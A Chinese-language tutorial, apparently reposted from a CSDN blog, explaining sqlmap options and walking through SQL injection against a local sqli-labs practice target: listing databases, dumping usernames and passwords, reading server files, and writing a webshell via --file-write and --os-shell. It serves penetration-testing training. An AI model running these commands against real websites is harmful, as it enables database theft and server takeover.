白晝安全

一、Sqlmap簡(jiǎn)介與使用
當(dāng)我們明白sql注入的原理，滲透過程似乎很簡(jiǎn)單。但事實(shí)上，在實(shí)際的滲透當(dāng)中，漏洞注入并非僅僅只是通過簡(jiǎn)單的一兩次嘗試就能夠得到測(cè)試人員想要的答案。很多時(shí)候，它需要經(jīng)過許多次繁雜的嘗試。所以，要提高滲透測(cè)試的效率，單純的依靠測(cè)試人員自身的實(shí)戰(zhàn)經(jīng)驗(yàn)也是遠(yuǎn)遠(yuǎn)不夠的。因此，我們需要滲透工具的幫助。而sqlmap就是這樣一款強(qiáng)大而且便于操作的滲透測(cè)試工具。

sqlmap是一個(gè)開源的滲透測(cè)試工具，可以用來(lái)進(jìn)行自動(dòng)化檢測(cè)，利用SQL注入漏洞，獲取數(shù)據(jù)庫(kù)服務(wù)器的權(quán)限。它具有功能強(qiáng)大的檢測(cè)引擎,針對(duì)各種不同類型數(shù)據(jù)庫(kù)的滲透測(cè)試的功能選項(xiàng)，包括獲取數(shù)據(jù)庫(kù)中存儲(chǔ)的數(shù)據(jù)，訪問操作系統(tǒng)文件甚至可以通過外帶數(shù)據(jù)連接的方式執(zhí)行操作系統(tǒng)命令。
1、Sqlmap的安裝

Sqlmap安裝完成后，那么即可開始使用。

2、sqlmap的使用
-u

指定目標(biāo)URL (可以是http協(xié)議也可以是https協(xié)議)

-d

連接數(shù)據(jù)庫(kù)

--dbs

列出所有的數(shù)據(jù)庫(kù)

--current-db

列出當(dāng)前數(shù)據(jù)庫(kù)

--tables

列出當(dāng)前的表

--columns

列出當(dāng)前的列

-D

選擇使用哪個(gè)數(shù)據(jù)庫(kù)

-T

選擇使用哪個(gè)表

-C

選擇使用哪個(gè)列

--dump

獲取字段中的數(shù)據(jù)

--dump-all

拖庫(kù)

--batch

自動(dòng)選擇yes

--smart

啟發(fā)式快速判斷，節(jié)約浪費(fèi)時(shí)間

--forms

嘗試使用post注入

-r

加載文件中的HTTP請(qǐng)求（本地保存的請(qǐng)求包txt文件）

-l

加載文件中的HTTP請(qǐng)求（本地保存的請(qǐng)求包日志文件）

-g

自動(dòng)獲取Google搜索的前一百個(gè)結(jié)果，對(duì)有GET參數(shù)的URL測(cè)試

-o

開啟所有默認(rèn)性能優(yōu)化

--tamper

調(diào)用腳本進(jìn)行注入

-v

指定sqlmap的回顯等級(jí)

--delay

設(shè)置多久訪問一次

--os-shell

獲取主機(jī)shell，一般不太好用，因?yàn)闆]權(quán)限

-m

批量操作

-c

指定配置文件，會(huì)按照該配置文件執(zhí)行動(dòng)作

-data

data指定的數(shù)據(jù)會(huì)當(dāng)做post數(shù)據(jù)提交

-timeout

設(shè)定超時(shí)時(shí)間

-level

設(shè)置注入探測(cè)等級(jí)共有五個(gè)等級(jí)，默認(rèn)為1級(jí)， 這個(gè)參數(shù)不僅影響使用哪些payload同時(shí)也會(huì)影響測(cè)試的注入點(diǎn)，GET和POST的數(shù)據(jù)都會(huì)測(cè)試，HTTP Cookie在level為2的時(shí)候就會(huì)測(cè)試，HTTP User-Agent/Referer頭在level為3的時(shí)候就會(huì)測(cè)試?？傊谀悴淮_定哪個(gè)payload或者參數(shù)為注入點(diǎn)的時(shí)候，為了保證全面性，建議使用高的level值。

--is-dba

判斷當(dāng)前用戶是否為數(shù)據(jù)庫(kù)管理員權(quán)限

--risk

風(fēng)險(xiǎn)等級(jí)

--identify-waf

檢測(cè)防火墻類型

--param-del="分割符"

設(shè)置參數(shù)的分割符

--skip-urlencode

不進(jìn)行url編碼

--keep-alive

設(shè)置持久連接，加快探測(cè)速度

--null-connection

檢索沒有body響應(yīng)的內(nèi)容，多用于盲注

--thread

最大為10 設(shè)置多線程

--delay

有些web服務(wù)器請(qǐng)求訪問太過頻繁可能會(huì)被防火墻攔截，使用--delay就可以設(shè)定兩次http請(qǐng)求的延時(shí)

--safe-url

有的web服務(wù)器會(huì)在多次錯(cuò)誤的訪問請(qǐng)求后屏蔽所有請(qǐng)求，使用--safe-url 就可以每隔一段時(shí)間去訪問一個(gè)正常的頁(yè)面。

--technique

指定注入類型

B:Boolean-based-blind （布爾型型注入）

E:Error-based （報(bào)錯(cuò)型注入）

U:Union query-based （聯(lián)合注入）

S:Starked queries （通過sqlmap讀取文件系統(tǒng)、操作系統(tǒng)、注冊(cè)表必須 使用該參數(shù)，可多語(yǔ)句查詢注入）

T:Time-based blind （基于時(shí)間延遲注入）

--tamper

語(yǔ)法：--tamper ["腳本名稱"]

當(dāng)調(diào)用多個(gè)腳本的時(shí)候，腳本之間用逗號(hào)隔開，調(diào)用的腳本在 sqlmap文件夾下的 tamper 文件夾中

-v ["x"]

使用sqlmap注入測(cè)試時(shí)，可以使用 -v [x] 參數(shù)來(lái)指定回顯信息的復(fù)雜程度, x 的取值范圍為[0~6]:

等級(jí)

解釋

0

只顯示python錯(cuò)誤以及嚴(yán)重信息

1

同時(shí)顯示基本信息和警告信息

2

同時(shí)顯示debug信息

3

同時(shí)顯示注入的pyload

4

同時(shí)顯示HTTP請(qǐng)求

5

同時(shí)顯示HTTP相應(yīng)頭

6

同時(shí)顯示HTTP相應(yīng)頁(yè)面

二、Sqlmap自動(dòng)化基礎(chǔ)注入實(shí)戰(zhàn)
環(huán)境：sql-lib靶場(chǎng)第一關(guān)，url如下

http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1
1、取數(shù)據(jù)庫(kù)名
python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" --dbs --batch
效果如下

2、讀取表名
python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" --tables --batch
效果如下

3、讀取字段名
python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" -T “users” --columns --batch
效果如下

4、讀取數(shù)據(jù)
python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" -T “users” -C “username,password” --dump --batch
效果如下

三、sqlmap讀取目標(biāo)系統(tǒng)文件
利用sqlmap讀取文件，也是需要滿足條件的。

（1）當(dāng)前sql注入用戶必須為DBA權(quán)限（--is-dba為true）

（2）需要知道網(wǎng)站的絕對(duì)路徑

（3）My.ini文件中的這項(xiàng)配置secure_file_priv=””為空

四、通過sqlmap寫入webshell
Sqlmap寫入webshell也是和手工寫入webshell一樣需要滿足條件：

（1）當(dāng)前sql注入用戶必須為DBA權(quán)限（--is-dba為true）
（2）需要知道網(wǎng)站的絕對(duì)路徑
（3）My.ini文件中的這項(xiàng)配置secure_file_priv=””為空
這個(gè)操作和通過sql注入的union配合into outfile原理一樣，只不過sqlmap提供了一鍵化操作，格式如下即可

--file-write //要寫入的文件
--file-dest //寫入文件存放的路徑
具體操作就是通過--os-shell，相信很多同學(xué)應(yīng)該都會(huì)了，所以這里就不多講了

原文鏈接：https://blog.csdn.net/qq_63844103/article/details/128671338

編輯：何安